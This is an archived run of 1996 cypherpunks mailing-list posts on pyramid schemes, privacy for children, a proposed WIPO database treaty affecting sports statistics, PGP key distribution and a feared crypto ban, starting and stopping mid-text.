
no.  far from it.

> 
> mhayes@infomatch.com
> 
> It's better for us if you don't understand
> It's better for me if you don't understand
>                                              -Tragically Hip




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 11 Nov 1996 07:09:49 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Pyramid Schemes
In-Reply-To: <2.2.32.19961112070453.00716a28@healey.com.au>
Message-ID: <7kD9wD23w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Benjamin Grosman <bgrosman@healey.com.au> writes:

> this is all well and good, but what I'd like to know is: do these schemes
> actually work? In theory they same to...

In depends on what you mean by "work". If you're asking whether MMFs result in
substantial amounts of money being sent to the originators, the answer is, I
don't know for sure, but I doubt it very much. (I've never tried it myself but
I interviewed a couple of people who did, for the research I did a few years
ago.) Similar MLM schemes (such as Amway or Herbalife) seem to result in
substantial profits for the owners/folks at the top of the pyramid, and losses
to most people who join later, as the theory would predict. So why do so many
people stay in programs like Amway despite their financial losses?

In my opinion, _all memetic communications work very well not as a scheme for
making money, but in the sense that people in the professions that involve
person-to-person networking (such as public relations, recruiting, real estate
and other sales) use them as a pretext to remind their business contacts of
their existence. E.g. a headhunter might pass on copies of the Craig Shergold
appeal to hundreds of potential recruits, with a note on his letterhead saying
"I'm passing this on on behalf of the dying boy". Moreover he'd probably pass
along photocopies of half a dozen letterheads from the chain of people who
passed the memetic letter along to him. Most recipients reaction can be
summarised as "What a nice person, what a good deed he's doing, do I need a
headhunter now"?

And by the way the reaction of the vast majority of Americans to a MMF snail
letter is "I'm so grateful to the sender for passing along this business /
networking opportunity." :-) which is why they're spread so eagerly by high
school kids in search of popularity.

I'm convinced that the good-luck chain letters (which just ask for the letter
to be passed along, with no money changing hands) and the various MMF variants
and MLM schemes are more about making/maintaining contacts than about money.

Likewise most Amway/Herbalife peddlers lose money but gain the satisfaction of
personal contact with the purchasers (which could be used for something else)
and also the sales experience that they can later use to sell something else.

How would Internet memetics be affected by wider availability of anonymity?
We observe that snail mail anonymity is available now, but is apparently
seldom used for memetics distribution. In the running example the p.r. person
already has the ability to make hundreds of photocopies of the Craig Shergold
letter and to snail-mail them to everyone s/he knows with no return address on
the envelope and the cover letter. I've never come across such behavior, which
is consistent with my belief that the sender is really interested in
distributing his/her letterhead more than in distributing the memetic letter.

When John Doe multi-posts the Craig Shergold's letter to thousands of Usenet
newsgroups (as was done again a few weeks ago), s/he's more interested in
splattering his own name around than in getting postcards/business cards to
the dying boy. (Of course the poster's intent is to be widely seen as someone
doing a good deed on behalf of Craig Shergold; instead he loses his Internet
account and is widely viewed as a clueless spammer. Such is life. :-)

At present someone could (ab)use the remailers to post anonymous Craig Shergold
appeals on Usenet and on various mailing lists. I believe that one of the
reasons why this has never been done (as far as I know) is because this would
deprive the poster of the satisfaction of having his own name splattered all
over the network.

MMFs are a slightly different story because the poster can't get money from the
"downline" without revealing some contact address to send the money to. Out of
curisority, I looked at several different MMF spams that came this way; in many
cases the sender's e-mail address is crudely forged; the money is requested to
be sent to a postal address that's often a P.O.Box; and the name associated
with the postal address is often missing, obviously phoney, or just has the
initials. There's clearly interested in anonymity on the part of MMF posters.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Finney <hal@rain.org>
Date: Mon, 11 Nov 1996 10:39:40 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Secrecy: My life as a nym. (Was: nym blown?)
Message-ID: <199611111626.IAA31552@crypt>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn makes a lot of good points regarding privacy.  One thing
I wanted to follow up on:

> Unfortunately, in the United States most citizens only become interested
> in privacy in their 20s or so.  By this time it is difficult to overcome
> the mass of information which has been stored up.  (Pseudocide can be an
> attractive option for some perhaps).

I have two kids entering their teens, and I'm sure other list members are
parents as well.  What can we do for our children to help them enter their
adult lives with better chances to retain privacy?  Unicorn mentions keeping
them absent from school on picture day, although I'm not sure how much this
helps.  I suppose it makes it harder for an investigator to find out what
they look(ed) like.  Then when they get old enough to drive you have a new
problem avoiding the photo (and thumbprint) on the license.

Are there other measures which parents could take while their children are
young to get them off to a good start, privacy-wise?

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Mon, 11 Nov 1996 08:39:54 -0800 (PST)
To: cypherpunks@toad.com
Subject: Sports Statistics to Be Regulated Under WIPO Treaty (fwd)
Message-ID: <v02140b02aead05d0c032@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Sun, 10 Nov 1996 11:30:41 -0600
>Reply-To: telecomreg@relay.doit.wisc.edu
>Originator: telecomreg@relay.doit.wisc.edu
>Sender: telecomreg@relay.doit.wisc.edu
>Precedence: bulk
>From: James Love <love@tap.org>
>To: Multiple recipients of list <telecomreg@relay.doit.wisc.edu>
>Subject: Sports Statistics to Be Regulated Under WIPO Treaty (fwd)
>X-Comment: Requests (UNSUBSCRIBE/HELP) to: listserver@relay.doit.wisc.edu
>MIME-Version: 1.0
>
>-----------------------------------------------------------------
>Info-Policy-Notes - A newsletter available from listproc@tap.org
>-----------------------------------------------------------------
>INFORMATION POLICY NOTES
>NOVEMBER 10, 1996
>
>                 Government Proposes New Regulation of
>                  Sports Statistics and other "facts"
>
>                            James Love
>                   Consumer Project on Technology
>                    http://www.essential.org/cpt
>                     love@tap.org; 202/387-8030*
>
>November 10, 1996
>
>This issue of INFO-POLICY-NOTES was formatted in 12 point
>courier, with 1 inch margins.  An HTML version of this note is
>available at http://www.essential.org/cpt/ip/wipo-sports.html
>
>
>        INTRODUCTION
>
>        Sports fans in the United States will be surprised to learn
>that U.S. Government officials are pressing for the adoption of
>an International treaty that will (if enacted) significantly
>change the ways sports statistics are controlled and
>disseminated.  The treaty isn't specifically directed at sports
>statistics -- it is a much broader attempt to create a new
>property right in facts and other data now in the public domain -
>- but it will have an enormous impact on the legal rights
>exercised by the National Football League (NFL), Major League
>Baseball (MLB), the National Basketball Association (NBA), the
>National Hockey League (NHL) and virtually all other professional
>or amateur athletic leagues.  [The same treaty will radically
>affect the way that stock prices, weather data, train schedules,
>data from AIDS research and other facts are controlled, but this
>note will focus on the issue of sports statistics, a topic that
>illustrates the broad impact of the treaty].
>
>        This comes at the same time the NBA and other sports
>franchises are stepping up their efforts to control the real time
>dissemination of sports statistics through the Internet or with
>wireless paging devices.  [See, for example,
>http://www.news.com/News/Item/0,4,3208,00.html].  The treaty,
>however, addresses different and much more fundamental issues
>regarding ownership of information.
>
>If the treaty is approved and implemented, sports leagues
>will have far broader powers to dictate the terms and conditions
>under which sport statistics are reported and disseminated.
>Nolan Ryan's Earned Run Average (ERA), the number of tackles or
>quarterback sacks by Lawrence Taylor, Cal Ripken's career batting
>average, Bobby Hull's career assists, the number of steals by
>your favorite NBA point guard, and similar information will be
>"owned" by sports leagues.  According to the proposed treaty (and
>legislation introduced in the 104th Congress to implement the
>treaty), the NFL, NBA, NHL and MLB will have the right to prevent
>anyone from publishing these and other statistics without express
>permission from the sports league.  This will include the right
>to control access to the historical archives of sports
>statistics, and even to dictate who can publish the box scores
>from a game or print a pitcher's ERA on the back of a baseball
>card.
>
>        The proposals for a new legal environment for publishing
>facts are outlined in a draft treaty on "databases" that will be
>considered at a December 1996 meeting of the World Intellectual
>Property Organization (WIPO), in Geneva, Switzerland.  [See
>www.public-domain.org/database/database.html]  The proposal would
>require the United States and other countries to create a new
>property right for public domain materials. "Texts, sounds,
>images, numbers, facts, or data representing any other matter or
>substance," will be protected.  [See the appendix for a more
>complete definition].
>
>The treaty seeks, for the first time, to permit firms to
>"own" facts they gather, and to restrict and control the
>redissemination of those facts.  The new property right would lie
>outside (and on top) of the copyright laws, and create an
>entirely new and untested form of regulation that would radically
>change the public's current rights to use and disseminate facts
>and statistics.  American University Law Professor Peter Jaszi
>recently said the treaty represents "the end of the public
>domain."
>
>Copies of the proposed treaty, a federal register notice
>asking for public comment, and independent commentary can be
>found at:
>
>http://www.public-domain.org/database/database.html
>
>WHO IS PUSHING FOR THE DATABASE TREATY?
>
>        In 1991, the US Supreme Court ruled (in the Feist decision)
>that the facts from a telephone "White Pages" directory of names,
>addresses and phone numbers were not protected under the
>copyright laws, and that in general, "facts" could not be
>copyrighted by anyone.  The Feist decision alarmed several large
>database vendors, who crafted this new "sui generis" property
>right that would protect facts, and just about everything else.
>[The vendors have already succeeded in obtaining a directive on
>database proposal from the European Union, although no European
>country has yet passed legislation to implement the treaty]. The
>most active supporter of this new property right is West
>Publishing, the Canadian legal publisher. A West Publishing
>employee chairs a key ABA subcommittee which wrote a favorable
>report on the treaty.  A number of very large British and Dutch
>database vendors are also lobbying hard for the treaty.
>
>West wants the new property right to protect the "page
>numbers" and "corrections" it adds to the judicial opinions it
>publishes in paper bound books.  Telephone companies want to
>protect the names, addresses and telephone numbers they publish,
>and other database vendors what to protect scientific data or
>other non-copyrighted government information they publish.  In
>seeking to protect these items, the treaty was written to stamp
>"owned by" labels on a vast sea of information now in the public
>domain.  Copyright experts J.H. Reichman and Pamela Samuelson
>say  it is the "least balanced and most potentially anti-
>competitive intellectual property rights ever created."
>[http://ksgwww.harvard.edu/iip/reisamda.html]
>
>There is an active debate within the Clinton Administration
>over the proposed treaty.   Bruce Lehman, the controversial head
>of the Patent and Trademark Office (PTO) is pushing for adoption
>of the treaty this December.  Most administration official don't
>have a clue what the database treaty does.  Some people think it
>is a minor tinkering with the current copyright law.  No one in
>the government has sought to understand the significance of the
>proposal in terms of the new rights to "own" facts, and until
>recently no one was aware that the treaty was so broad that it
>would change the way sports or financial statistics were
>controlled.
>
>        HOW WILL THE TREATY WORK?
>
>        In Feist, the Supreme Court noted:
>
>     (a) Article I, Sec. 8, cl. 8, of the Constitution mandates
>     originality as a prerequisite or copyright protection. The
>     constitutional requirement necessitates independent creation
>     plus a modicum of creativity. Since facts do not owe their
>     origin to an act of authorship, they are not original and,
>     thus, are not copyrightable.
>     [From the Syllabus of the opinion, at
>     http://www.law.cornell.edu/supct/classics/499_340v.htm]
>
>Since facts cannot be copyrighted, the supporters of the
>treaty have framed this as a new "sui generis" property right,
>which will have a separate statutory framework.  "Originality" or
>"authorship" will not be required. "Texts, sounds, images,
>numbers, facts, or data representing any other matter or
>substance," will be protected. The information can be stored in
>"all forms or media now known or later developed." Both published
>and confidential information will be covered.  The only thing
>required is a  "substantial investment in the collection,
>assembly, verification, organization or presentation of the
>contents" of the protected work.  The "rightholder" will have
>extremely broad powers to "authorize or prohibit the extraction
>or utilization" of the information from the protected database.
>
>It takes a while for the implications of this new system to
>sink in.  Some facts can be independently gathered, like the
>number of baseball games played in a year, the winners or losers
>of a tennis match, or the scores of a football game.  For these
>data, there may exist several sources for the data.  However,
>other facts are, by their very nature, only available from a
>single source, and will be controlled by monopolies.  For
>example, baseball leagues employ scorekeepers who determine if a
>batter is credited with a hit or if a fielder committed an error,
>if a hit is reported as a single or double, or if an errant pitch
>is scored as a wild pitch or a passed ball.  The league makes a
>"substantial investment" in the collection and maintenance of
>this data, which it disseminates to the press, and also stores
>and maintains in a database, through an arrangement with the
>Elias Sports Bureau.  These data cannot be independently
>collected - and under the proposed database treaty, the league
>would own the facts themselves, and could dictate the terms under
>which these facts are published or redisseminated.
>
>The NFL employs four persons who keep track of the play-by-
>play action for each game.  They write up four separate reports,
>which are used to create a single official "box score." The final
>product is supervised by the Elias Sports Bureau, as a "work for
>hire" product, which is owned by the NFL. The NFL box score is
>very detailed, and includes analysis of each play.   It records
>the league's statistics for the number of yards gained (or lost)
>on each play, who is credited with a tackle or a quarterback
>sack, or the number return yards on a kickoff or pass
>interception, and many other items.  While someone who attended a
>football game could make an independent estimate of these items,
>it would likely be different from the official statistics, due to
>the inherent difficulty in measuring or assigning credit for
>performance on the field.  The NFL's box score is given to the
>press, which uses the data to create its own news media reports.
>
>An attorney who represents the National Football League
>(NFL) told us that the NFL has an interest in insuring that there
>is an "official" source of the statistics, which are gathered
>with an appropriate standard of care and that the NFL "protects
>the official designation" of its statistics.  These data are used
>for making decisions on the Hall of Fame, and to create special
>reports and information products, which the NFL provides to third
>parties, often for a fee.
>
>Virtually all of the major league sports leagues have some
>system for creating statistics, disseminating the information to
>the press, storing the historical data, and marketing the
>statistics commercially.   Major League Baseball and the NBA work
>with Elias, while the NBA and the NHL have their own in-house
>system.  There is little doubt the process by which these
>statistics are generated will qualify for protection, under the
>treaty's minimal requirement that the league demonstrate it has
>made a "substantial investment in the collection, assembly,
>verification, organization or presentation of the contents" of
>database.  The work-for-hire "media sheets," "box scores," and
>other press handouts which report the statistics would be
>considered database elements, and reporting of statistics from
>these products would be subject to an entirely new type of
>licensing and control by the leagues which is far stronger than
>that which exists under copyright law.  [See appendix].
>
>The leagues have various methods of selling their "official"
>branded statistics.  There are also many competitors who build
>databases from a variety of sources, including the published box
>scores that appear in daily newspapers, and probably the books
>and reports published by the leagues.  The leagues do not
>currently assert "ownership" in the statistics directly, even as
>they try to prevent others from referring to the data as
>"official" statistics, but they are trying to prevent real time
>reporting of game statistics and situations over Internet or
>paging technologies.
>
>The NBA told us that it permits accredited journalists to
>report scores from NBA games three times each quarter, and that
>it considers the minute to minute reports a "misappropriation" of
>its ability to sell performance rights for the event.  The NFL
>takes a similar position with respect to its games.  STATS, Inc.
>is a firm that provides real time scores and play-by-play
>descriptors to a variety of online and wireless information
>services.  According to the NFL and the NBA, STATS, Inc. hires
>people to watch television broadcasts of the games, and type the
>play-by-play information into personal computers, which are
>linked to the STATS, Inc. computer network services.  An example
>of this type of service that uses STATS, Inc. as a supplier of
>statistics is Instant Baseball, available at
>http://www.InstantSports.com/.  Disputes over the real time
>Internet broadcasts of game situations and scores could well end
>up before the U.S. Supreme Court, as a test of the first
>amendment.  In the NBA case involving Motorola, STATS, Inc. and
>America Online, the NFL and other leagues have filed amicus
>briefs in support of the NBA position, while the New York Times
>has filed a brief in support of Motorola, STATS, Inc. and America
>Online.
>
>About two weeks ago the NBA discovered HR 3531, a version of
>the database protection proposal that was introduced in the U.S.
>Congress last spring.  The NBA is looking at HR 3531 to see if it
>would provide a legislative remedy for their dispute with
>Motorola, et. al.  (Like the other leagues, the NBA wasn't aware
>of the database treaty until last week.)
>
>At present, none of the leagues currently prevent anyone
>from publishing statistics after a game is over, because it is
>assumed that the statistics (facts) are in the public domain,
>once the broadcasts are over.  But this would likely change if
>the database treaty is enacted.  One league official told me, "no
>matter how appalled I am at this proposal personally, as a civil
>libertarian, my client may have interests as a rightholder that
>it will want to exercise."  A lawyer for the NFL said that the
>NFL might not want to do anything - he thought the free
>dissemination of statistics brought its own benefits, in terms of
>increased fan interest.  But he also said, the treaty would allow
>the NFL to "do quite a bit of stuff," in terms of new licensing
>arrangements or other ventures, if it wanted to.
>
>As a "sui generis" property right, the database proposal
>does not incorporate the fair use principles from copyright that
>reporters and value added publishers often take for granted.  The
>leagues would be able to require license to publish box scores or
>other statistics in any media.  One can imagine a world where the
>leagues wouldn't require licensing of box scores to print based
>periodicals like daily newspapers, but that a much more
>controlled regimen would evolve on the Internet.  The leagues
>could require licensing of box scores and other statistics for
>Internet publications, or linking to the leagues own web sites,
>such as www.nba.com, www.nba.com, or www.nhl.com.  The Internet
>is, after all, a very easy place to locate and police violations
>of intellectual property rights --  through a simple AltaVista
>search.  This would also likely lead to major changes in the
>market for baseball (and other sports) cards, which typically
>feature key statistics on the flip side of the card.  The new
>database extract rights would prohibit any unauthorized
>extraction or reuse of data that had economic value to the
>leagues (See discussion in Appendix).
>
>WHAT CAN YOU DO?
>
>The government is taking comments on the database treaty
>through November 22, 1996.  If you don't think the government
>should rush into a new regulatory scheme for sports statistics,
>let them know.  You can email your comments to:
>diploconf@uspto.gov.
>
>If you want to know more about his proposal, check out
>http://www.public-domain.org/database/database.html.
>
>PS
>
>Of course, this treaty deals with a lot more than sports
>statistics.  It will do the same thing for information on stock
>prices that is generated by a stock exchange.  It will radically
>change the market for weather information.   There is concern in
>Europe over the control over train schedules.  Private Schools
>could use the new data extraction right to prevent unauthorized
>publication of data about its student's test scores or post
>graduate placement statistics (both generated from a database).
>The treaty would radically change the rights to use information
>from gene sequencing, or hospital cost benefit studies.  It will
>obviously do much much more.
>
>Since I have tried to keep this note simple, a lot has been
>left out.  But consider this.  The treaty, which was designed to
>protect West Publishing's legal reporters, has been written so
>broadly that it will define even the daily newspaper as a
>"database" element.  Since the new property right is additive to
>to all rights claimed under copyright, every publisher will claim
>the additional protection, by saying each issue of the newpaper
>is a database element.  (virtually all newspapers today are
>archived in databases). The consequences of this are astounding,
>since every fact and article in every newspaper will have the new
>stronger form of protection, which will not include any public
>fair use rights.
>
>You might ask your member of Congress what the heck is going
>on with the treaty, and see if they understand it.
>
>        James Love, Director
>        Consumer Project on Technology
>        202/387-8030; love@tap.org
>
>* I will be out of the U.S. from November 11 to November 20,
>attending a conference on the impact of international trade
>agreements on intellectual property rights in New Delhi, India,
>and will be hard to reach before the 21st.
>
>
>Two law professors who have studied the treaty extensively are:
>
>Professor Pamela Samuelson, University of California at Berkeley,
>Voice (510)642-6775, pam@sims.berkeley.edu
>
>Professor Peter Jaszi, American University, School of Law, Voice
>(202) 885-2600, pjaszi@wcl.american.edu
>
>
>
>
>                             APPENDIX
>-----------------------------------------------------------------
>Extracts from James Love, "A Primer On The Proposed WIPO Treaty
>On Database Extraction Rights That Will Be Considered In December
>1996, October 29, 1996, http://www.essential.org/cpt/ip/cpt-
>dbcom.html]
>
>
>WHAT IS A DATABASE? WHAT ISN'T A DATABASE?
>
>The treaty would protect "any database that represents a
>substantial investment in the collection, assembly, verification,
>organization or presentation of the contents of the database."
>This term should be understood "to include collections of
>literary, musical or audiovisual works or any other kind of
>works, or collections of other materials such as texts, sounds,
>images, numbers, facts, or data representing any other matter or
>substance" and "may contain collections of expressions of
>folklore." The "protection shall be granted to databases
>irrespective of the form or medium in which they are embodied.
>Protection extends to databases in both electronic and non-
>electronic form" and "embraces all forms or media now known or
>later developed. . . Protection shall be granted to databases
>regardless of whether they are made available to the public. This
>means that databases that are made generally available to the
>public, commercially or otherwise, as well as databases that
>remain within the exclusive possession and control of their
>developers enjoy protection on the same footing."
>
>
>
>WHAT ARE EXTRACTION AND UTILIZATION RIGHTS?
>
>"The maker of a database eligible for protection under this
>Treaty shall have the right to authorize or prohibit the
>extraction or utilization of its contents." What is "extraction"?
>Extraction is defined as, "the permanent or temporary transfer of
>all or a substantial part of the contents of a database to
>another medium by any means or in any form." "Extraction . . . is
>a synonym for `copying' or `reproduction' . . . by `any means' or
>`any form' that is now known or later developed."
>
>"Utilization" is defined as "making available to the public all
>or a substantial part of the contents of a database by any means,
>including by the distribution of copies, by renting, or by on-
>line or other forms of transmission," including the right to
>control the use of the data "at a time individually chosen by
>each member of the public."
>
>WHAT IS A "SUBSTANTIAL PART" OF THE DATABASE?
>
>The treaty sets out tests for determining if an extraction is
>"substantial," and these tests are both highly anticompetitive,
>and extremely broad in scope.
>
>The "substantiality" of a portion of the database is assessed
>against the "value of the database," and considers "qualitative
>and quantitative aspects," noting that "neither aspect is more
>important than the other . . . This assessment may also take into
>account the diminution in market value that may result from the
>use of the portion, including the added risk that the investment
>in the database will not be recoverable. It may even include an
>assessment of whether a new product using the portion could serve
>as a commercial substitute for the original, diminishing the
>market for the original."
>
>Then the treaty adds that a "substantial part" means any portion
>of the database, "including an accumulation of small portions . .
>. In practice, repeated or systematic use of small portions of
>the contents of a database may have the same effect as extraction
>or utilization of a large, or substantial, part of the contents
>of the database."
>
>In the US implementing legislation, the only types of data use
>that would not be regulated would be "insubstantial" parts,
>"whose extraction, use or reuse does not diminish the value of
>the database, conflict with a normal exploitation of the database
>or adversely affect the actual or potential market for the
>database." Under this language, a database owner could say that
>it might in the future want to charge for each transmission of a
>fact or an element of a database as part of its "normal
>exploitation" of the database. With the Internet and digital cash
>this claim is likely to be made. The public would not have "fair
>use" rights, since fair use is only defined in matters involving
>copyright.
>
>FOR HOW LONG? 15 YEARS, 25 YEARS, OR FOREVER?
>
>The Treaty would require a minimum term of protection (15 years
>in the EU proposal, and 25 in the United States proposal) for the
>database. But this is extended each time the database is revised
>or enhanced. According to the draft treaty, "any substantial
>change to the database, evaluated qualitatively or
>quantitatively, including any substantial change resulting from
>the accumulation of successive additions, deletions,
>verifications, modifications in organization or presentation, or
>other alterations, which constitute a new substantial investment,
>shall qualify the database resulting from such investment for its
>own term of protection."
>
>The provision on revisions raises the specter that protection for
>many databases will be perpetual. This could indeed be the case
>if the original versions of the database  are only "licensed" by
>the vendor for a limited period of time, so that the only
>available versions would be the new ones, which would have a new
>term of protection. [Database vendors write these restricted use
>licenses now].
>
>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
>INFORMATION POLICY NOTES is a free Internet newsletter sponsored
>by the Taxpayer Assets Project (TAP) and the Consumer Project on
>Technology (CPT).  Both groups are projects of the Center for
>Study of Responsive Law, which is run by Ralph Nader.  The
>LISTPROC services are provide by Essential Information.  Archives
>of Info-Policy-Notes are available from
>
>http://www.essential.org/listproc/info-policy-notes/
>
>TAP and CPT both have Internet Web pages.
>
>http://www.tap.org
>http://www.essential.org/cpt
>
>Subscription requests to info-policy-notes to listproc@tap.org with
>the message:  subscribe info-policy-notes Jane Doe
>
>TAP and CPT can both be reached off the net at P.O. Box 19367,
>Washington, DC  20036, Voice:  202/387-8030; Fax: 202/234-5176
>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Mon, 11 Nov 1996 08:40:56 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Sports Statistics to Be Regulated Under WIPO Treaty (fwd)
Message-ID: <v02140b01aead0581ad8f@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


This was my response to the excellent Telecom Regulation posting by Mr. Love.

[snip]
>If the treaty is approved and implemented, sports leagues
>will have far broader powers to dictate the terms and conditions
>under which sport statistics are reported and disseminated.
>Nolan Ryan's Earned Run Average (ERA), the number of tackles or
>quarterback sacks by Lawrence Taylor, Cal Ripken's career batting
>average, Bobby Hull's career assists, the number of steals by
>your favorite NBA point guard, and similar information will be
>"owned" by sports leagues.  According to the proposed treaty (and
>legislation introduced in the 104th Congress to implement the
>treaty), the NFL, NBA, NHL and MLB will have the right to prevent
>anyone from publishing these and other statistics without express
>permission from the sports league.  This will include the right
>to control access to the historical archives of sports
>statistics, and even to dictate who can publish the box scores
>from a game or print a pitcher's ERA on the back of a baseball
>card.
[snip]
>
>The treaty seeks, for the first time, to permit firms to
>"own" facts they gather, and to restrict and control the
>redissemination of those facts.  The new property right would lie
>outside (and on top) of the copyright laws, and create an
>entirely new and untested form of regulation that would radically
>change the public's current rights to use and disseminate facts
>and statistics.  American University Law Professor Peter Jaszi
>recently said the treaty represents "the end of the public
>domain."
>

I couldn't be more pleased that sports and greedy corporations which are
fixtures of American life are pushing for these draconian measures.  I hope
they pass with the strongest possible language and penalties and will
support same.

A broad section of the populace now takes this information for granted.
They will be outraged their elected representatives pass measures which
noticably limit their access to 'public domain' information which are part
of their daily lives.  This will serve to expose many of our elected as the
special interest puppets they are and align the common citizen with the
cypherpunks.  This, in turn, will undermine confidence in our
'unrepresentative' government and its authority.  Best of all it could lead
to populist boomerang legislation which emasculates current copyright law
and via widespread and flagrant 'civil disobedience' regarding copyright on
the Net.

I'm rubbing my hands in anticipation.



PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Steve Schear             | Internet: azur@netcom.com
Lamarr Labs              | Voice: 1-702-658-2654
7075 West Gowan Road     | Fax: 1-702-658-2673
Suite 2148               |
Las Vegas, NV 89129      |
---------------------------------------------------------------------

Internet and Wireless Development

Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne, Libertarian, for President.
http://www.harrybrowne96.org






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Finney <hal@rain.org>
Date: Mon, 11 Nov 1996 10:39:52 -0800 (PST)
To: meriman@amaonline.com
Subject: Re: Rarity: Crypto question enclosed
Message-ID: <199611111636.IAA31569@crypt>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 10 Nov 1996, David K. Merriman wrote:
>
> My simple question is regarding key/certificate distribution:
> 
>         Is there any particular reason that such can't be accomplished via 
> on-line lists, and made available via a service on a port, using standard 
> (textual) commands, like mail and such are now?

There are a few things available or in the works right now.

Most of the PGP key servers respond to WWW requests already.  You connect
to them on a port, the HTTP port, send some standard textual commands
following the HTTP protocol, and get the requested PGP keys back in text
form.  How does this differ from what you were thinking of?

Other proposals, including Ron Rivest's SDSI, envision an environment where
most people make their own keys available via a URL.  Certificates would
have this URL in them and you could check it to make sure the key has not
expired or been revoked.  Then the only problem is distributing the URL...

John Gilmore's SWAN project is working to put keys into Domain Name System
(DNS) databases.  He has sample code which will get keys dynamically via
DNS calls, and DNS servers are now available which will support the new
data types necessary.  You can actually get his own key right now from
toad.com via this method.  This is a binary protocol rather than a textual
one but could be a good way to do it.

So I think you are right that on-the-fly key grabbing is the direction
in which things are moving, replacing large local databases of keys.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SUCRUM22_at_INDY-ADP@smtp-gw.cv62.navy.mil
Date: Sun, 10 Nov 1996 15:42:08 -0800 (PST)
To: Paul Foley <cypherpunks@toad.com
Subject: Re[2]: a retort + a comment + a question = [RANT]
Message-ID: <9610118477.AA847730399@smtp-gw.cv62.navy.mil>
MIME-Version: 1.0
Content-Type: text/plain


     ---------------------------------------------------------------------- 
     Paul Foley <mycroft@actrix.gen.nz> wrote at the end 
     of an enlightening message:
     >(BTW, does your address @smtp-gw.cv62.navy.mil imply 
     >that that you're actually aboard the Independence?)
     
     yes it does.  questions/comments can be directed via e-mail to my
     address as i am already _almost_ off-topic.  remember people, i'm
     playing devil's advocate here.  so far, while nothing has really
     changed my thinking process outright, comments are surely making 
     me think more (assuming that that's the point).
     
     ---------------------- SUCRUM22@cv62.navy.mil -----------------------
       a calculated risk based on the possible consequence of an action
      is better than a haphazard one based on poor judgment or ignorance
     ---------------------------------------------------------------------
     Don't confuse my views with those of the DoD or the United States Navy
     
     
     
     
     




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Clay Olbon II <clay.olbon@dynetics.com>
Date: Mon, 11 Nov 1996 05:49:42 -0800 (PST)
To: Rabid Wombat <cypherpunks@toad.com
Subject: Re: Pyramid schemes and cryptoanarchy
Message-ID: <1.5.4.32.19961111134757.00a03df0@ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:39 PM 11/10/96 -0500, Rabid Wombat wrote:
>On Sun, 10 Nov 1996, Clay Olbon II wrote:
>
>> Pyramid schemes could be a growth market in a crypto-anarchic world.  It is
>> yet another market such as gambling, or the lottery, that could be conducted
>> with anonymity.  And it appears to be much more widespread on the internet
>
>How is it like gambling? If I get a pyramid letter instructing me to send 
>money to five people on the list, add my name to the bottom, send to 5 
>people, or whatever, there's nothing stopping me from removing all the 
>names, adding my name and those of four friends, and passing the letter 
>along. With an anonymous system, I could easily be all five people, 
>without even the bother of getting five different post office boxes.

I was not saying that chain letters are like gambling.  My point was that
they could be conducted with anonymity - like gambling and the lottery.
Your other point is well made.  Anyone have ideas on a protocol to prevent
this problem?

>
>There's no gambling involved; only blantant stupidity.

Agreed.  Although I think gambling and the lottery are pretty stupid as well
("The lottery is a tax on people who are bad a math" - from a friend's .sig).

>The "airplane" game was an interesting slant, though. Because of the 
>in-person "airplane" parties, people were able to make contacts and 
>network while participating. It was still the same old trick, but some 
>may have found the ability to "buy" (and "sell") face time worth the price 
>of admission (Some of the "airplane" games going around were to the tune 
>of $2500, rather than the usual $5). Your anonymous slant on 
>this removes the only economically viable excuse for participating, 
>though - I don't even get to meet the head of the umptysquat dept. in 
>return for getting fleeced.
>
>The "airplane game" was big around Washington about a year ago, and
>involved a number of highly placed people who aught to have been able to 
>recognize a Ponzi scheme when it bit them in the ass. Makes me wonder how 
>many people are stupid enough to "play" these games. 

I'm not familiar with the airplane game.  Sounds like a DNC fundraiser to me
;-) And yes, I think there are a lot of stupid people out there (ex. I
started a new job recently and noticed that a warning about the "Good Times
Virus" was posted on the bulletin board).  I'm not sure that the game would
even have to be close to fair for plenty of people to participate -
especially if it involves digital cash and email, which may be much easier
than snail-mailing letters. 

        Clay
*******************************************************
Clay Olbon			clay.olbon@dynetics.com
engineer, programmer, statistitian, etc.
Dynetics, Inc.
**********************************************tanstaafl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Finney <hal@rain.org>
Date: Mon, 11 Nov 1996 10:41:36 -0800 (PST)
To: cypherpunks@toad.com
Subject: So how does the crypto crackdown go?
Message-ID: <199611111718.JAA31638@crypt>
MIME-Version: 1.0
Content-Type: text/plain


I've enjoyed Peter Hendrickson's provocative postings and the many good
responses.  However I don't think we should forget that the FBI and
other law enforcement agencies almost certainly do hope to ban strong
encryption in the U.S. and in other countries as well.  So it is worth
discussing how the ban is likely to happen and what impact, if any, it
would have.  I could see such a measure going into effect after the next
terrorist attack as part of a comprehensive bill that also includes
taggants in explosives, more permission for wiretaps and surveillance of
terrorists, and similar items on the LEA laundry list.

Keep in mind the effects of the current ban on U.S. exports of crypto
technology.  Obviously this have not stopped crypto from moving
overseas.  But it has definitely had significant effects.  It is _not_
widely ignored, at least in public.  That is why we work so hard to
overturn it; if it had no effect, we wouldn't care.  Companies are much
more careful about how and whether they will distribute crypto on the
